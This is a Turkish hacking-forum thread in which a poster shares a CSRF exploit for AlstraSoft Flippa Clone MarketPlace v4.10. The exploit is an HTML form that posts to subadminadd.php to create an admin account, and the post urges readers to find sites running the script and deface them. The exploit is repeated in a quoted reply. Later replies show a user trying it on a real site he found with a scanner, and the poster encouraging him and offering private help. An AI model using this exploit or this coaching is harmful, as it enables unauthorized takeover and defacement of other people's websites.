Güncel CSRF Açığı (Admin Ekleme) 04.02.2017

[BH80]

# TURKHACKTEAM.ORG // BH80 #



#######
# Exploit Title: AlstraSoft Flippa Clone MarketPlace v4.10 Script - Cross-Site (Add Admin)
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: PHP Clone Script - Leading Software Provider for Pinterest, Groupon, Facebook, Fiverr, Youtube and Paypal Clone
# Version: 4.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #

Merhaba arkadaşlar bugün sizlere daha çıkalı 2 gün olan bir güvenlik açığını paylaşacağım ve çokta tehlikeli bir güvenlik açığı scriptin yüklü olduğu siteleri bulabilirseniz çok rahat defaceleyebilirisiniz.
Html kod yardımı ile dışarıdan müdahale edilebilir ve siteye admin hesabı ekleyerek giriş yapabilirisiniz. Açığı nasıl kullanacağınızı anlatmak için bir video çektim anlamadığınız yer olursa mesaj atabilirsiniz.



YOUTUBE VİDEO LİNKİ:

[ame]https://www.youtube.com/watch?v=PPQK7Hgejg8&[/ame]


Demo: Flippa Clone Marketplace Script

<html>
<body>
<form name="frmSubadmin" action="http://localhost/[PATH]/subadminadd.php" method="POST" >
<td align="left" style="padding-left:15px" height="25" align="center">SubAdmin Management [Add]</td>
<input type="text" name="user_login" size="40" maxlength="50" class="textbox" value="">
<input type="password" name="user_passwd" size="40" maxlength="50" class="textbox"  value="">
<input type="submit" name="Sumbit" value="Save" class="stdButton">
</form>
</body>
</html>

 

['Taipan]

# TURKHACKTEAM.ORG // BH80 #



#######
# Exploit Title: AlstraSoft Flippa Clone MarketPlace v4.10 Script - Cross-Site (Add Admin)
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: PHP Clone Script - Leading Software Provider for Pinterest, Groupon, Facebook, Fiverr, Youtube and Paypal Clone
# Version: 4.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #

Merhaba arkadaşlar bugün sizlere daha çıkalı 2 gün olan bir güvenlik açığını paylaşacağım ve çokta tehlikeli bir güvenlik açığı scriptin yüklü olduğu siteleri bulabilirseniz çok rahat defaceleyebilirisiniz.
Html kod yardımı ile dışarıdan müdahale edilebilir ve siteye admin hesabı ekleyerek giriş yapabilirisiniz. Açığı nasıl kullanacağınızı anlatmak için bir video çektim anlamadığınız yer olursa mesaj atabilirsiniz.



YOUTUBE VİDEO LİNKİ:

https://www.youtube.com/watch?v=PPQK7Hgejg8&


Demo: Flippa Clone Marketplace Script

<html>
<body>
<form name="frmSubadmin" action="http://localhost/[PATH]/subadminadd.php" method="POST" >
<td align="left" style="padding-left:15px" height="25" align="center">SubAdmin Management [Add]</td>
<input type="text" name="user_login" size="40" maxlength="50" class="textbox" value="">
<input type="password" name="user_passwd" size="40" maxlength="50" class="textbox"  value="">
<input type="submit" name="Sumbit" value="Save" class="stdButton">
</form>
</body>
</html>

Eline sağlık tertip

 

[Rolls]

Konuyla ilgili yarın inceleyecem komutanım paylaşım için elinize sağlık

 

[LinuxTurk]

Ellerinize Saglik

 

[meltar95]

Paylaşım güzel teşekkürler fakat Flippa Clone MarketPlace kullanan siteleri nasıl tespit edebiliriz bunu da çözmemiz lazım

 

[P4RS]

Ellerine sağlık kardeşim

 

[Dr3D]

Hocam bnde acunetixten tarattım buldum ama site asp ile kodlanmış uzantıyı yani subadminadd.php yazan yeri subadminadd.asp yaptım açtım şifreyi yazdım giriş yapınca hata verdi nerde yanlış yaptım acaba ?

 

[DEADMAN134]

Eline Sağlık dostum

 

[BH80]

Hocam bnde acunetixten tarattım buldum ama site asp ile kodlanmış uzantıyı yani subadminadd.php yazan yeri subadminadd.asp yaptım açtım şifreyi yazdım giriş yapınca hata verdi nerde yanlış yaptım acaba ?

Her kodlama aynı site de çalışmaz kardeşim, özellikle kodlama dilleri farkı ise, bir de bu tür siteleri bulmak size kalmış siteleri diğerlerinden farklı kılan bir özelliği olmadığı için dork oluşturulamamış ama siz hayal gücünüzü kullanarak belki bir dork üretebilirsiniz..

 

[Dr3D]

Her kodlama aynı site de çalışmaz kardeşim, özellikle kodlama dilleri farkı ise, bir de bu tür siteleri bulmak size kalmış siteleri diğerlerinden farklı kılan bir özelliği olmadığı için dork oluşturulamamış ama siz hayal gücünüzü kullanarak belki bir dork üretebilirsiniz.

Hack konusunda bilgim yok hocam araştırmalar yaparak birşeyler öğrenmeye çalışıyorum ama nedense bi türlü site düşeremdim daha .

 

[BH80]

Hack konusunda bilgim yok hocam araştırmalar yaparak birşeyler öğrenmeye çalışıyorum ama nedense bi türlü site düşeremdim daha .

Biraz daha araştırırsan yapacağına eminimin azim et, takıldığın yerlerde özelden mesaj atarsan yardımcı olurum.

 

[reyi023]

Ellerine sağlık

 

[BH80]

Sağolun arkadaşlar, başarılar diliyorum.

 

[BH80]

Eline sağlık tertip

Sağol Tertip

 

[Rospovà]

Elinize sağlık

 

[#~Massive`]

Elinize sağlık

 

[BH80]

Sağolun arkadaşlar